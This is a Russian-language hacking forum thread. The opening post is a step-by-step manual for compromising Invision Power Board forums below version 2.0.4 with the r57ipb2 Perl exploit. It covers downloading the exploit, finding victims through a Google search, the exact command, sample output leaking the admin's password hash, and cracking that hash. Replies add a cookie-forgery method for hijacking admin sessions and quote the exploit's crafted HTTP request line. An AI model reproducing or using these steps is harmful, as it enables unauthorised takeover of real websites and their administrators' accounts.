![]() |
Взлом форумов IPB (Invision Power Board) < 2.0.4
Взлом форумов IPB (Invision Power Board) < 2.0.4
Делать мы это будем при помощи эксплоита. Итак что нам понадобится: -Голова -Руки. Растущие из правильного (с анатомической точки зрения) места. -Active Perl -Сплоит -MD5 INSIDE (для расшифровки хешей) Итак приступим. 1)Качаем Active Perl Устанавливаем к примеру в c:\perl Создаем папку c:\perl\sploits -Место где будут лежать сплоиты 2)Далее качаем сплоит. Он называется: r57ipb2 Лежит тут: http://rst.void.ru/download/r57ipb2.txt Сохраняем в с:\perl\sploits\ Идем в с:\perl\sploits\ и переименовываем r57ipb2.txt в r57ipb2.pl Правим сплоит.( Там одна ошибка стоит только присмотреться и сразу бросится в глаза.) 3)Ищем жертву. Google в помощь. (Для тех кто в танке: набираем в поле поиска - Powered by Invision Power Board) 4)Идем в командную строку и набираем что-то вроде: perl c:\perl\splots\r57ipb2.pl www.target.com /directory/ 1 X Итак разбираем что я только что написал: [+]perl - Запускаем Active Perl; [+]c:\perl\splots\r57ipb2.pl - пусть к сплоиту; [+]www.target.com - Цель; [+]/dir/ - Директория, где хранится форум.Пример: /forum/ Примечание если форум находится в корневом каталоге, то вводим просто: / Пример: perl c:\perl\splots\r57ipb2.pl www.target.com / 1 X [+]1 - ID пользователя. (1 - ADMIN); [+]X - Вместо Х надо ввести 1 или 0 1 - Если форум версии [2.0.0; 2.0.4) 0 - Eсли форум версии < 2.0.0 ======================================== Должно получиться что-то вроде этого: ## r57ipb2.pl www.anyurl.com /forum/ 1 0 ## [~] SERVER : www.target.com ## [~] PATH : /forum/ ## [~] MEMBER ID : 1 ## [~] TARGET : 0 - IPB 1.* ## [~] SEARCHING PASSWORD ... [ DONE ] ## ## MEMBER ID : 1 ## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99 ========================================= 5)Мы получили не сам пасс, а его хеш. Теперь из хеша получим пасс. Для этого нам нужна прога MD5INSIDE. Создаем текстовый док. Вставляем в него хеш. Заходим в MD5INSIDE. "Файл" >> "Открыть" находим наш док с хешом. "Поиск". Дальше как повезёт. 6)Итак пасс получен. |
Так в Ipb 2.* хэширование же с солью...
|
Зря ты подробный мануал выложил...
Счас в сети не одного Ipb-форума не останется :) |
В примере автор ломает ipb версии 1.x.x.
А в ipb 2.x.x по крайней мере мы можем подделать кикисы... 1) Заходим на форум регимся, и вбиваем логин с паролем... 2) В опере заходим Сервис(Tolls)->Управление cookies(manage cookies)... 3) Ищем папку с именем форума... 4) Удаляем все параметры кроме: member_id pass_hash 5) меняем оставшиеся параметры на полученные эксплоитом... 6) Нажимаем "Обновить" ЗЫ Я знаю, что все это знают... просто вдруг кто-то незнает.... |
Цитата:
Ну если что можно давать ссылку на этот топик тем кто спрашивает: как взломать форум? Последовательность действий понятна. Остальное.... тоже есть в инете. :-) |
Вроде видео по этому сплоиту есть...
|
Мля! Чё за бред? Вы сначало попробуйте по запросу "Powered by Invision Power Board" найти не пропатченный форум=) Этот сплойт не вчера появился...
|
Цитата:
|
Цитата:
|
классный мануал !
|
ага видео есть тока там еще добавленоо видео от coylа
ето уже старо сейчас версии выше или пропатчены форумы ну конечно есть еще и уязвимые форумы но скорее всего они или неинтересны или на форуме по 10-30 чел зарегины(и форумы бесплатны)! ---------------------- ну возможно твои пост комуто пригодиться |
Зачем такой мануал ???
ведь вреале видео есть и со сплойтом ! и подробно всё описано ! Автор поста видать тока проснулся :p |
Это видео к 2.0.4 никакого отношения не имеет. Там это написано.
|
a ktonebut znait kak ispravit strochku 134 ?
|
видео есть, там всё подробно описано!!! нафиг по 100 раз создавать темы! даещё и старое!
|
Вроде же киборг выкладывал подобное.
|
Цитата:
|
Если 8ая опера:
инструменты - настройки - вкладка дополнительно - управление кукис. |
Нашел. У меня седьмая )
Для седьмой: файл- настройки-конфеденциальность- управление кукисами ---- Цитата:
Код:
printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n", $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh); |
Цитата:
|
| Время: 22:41 |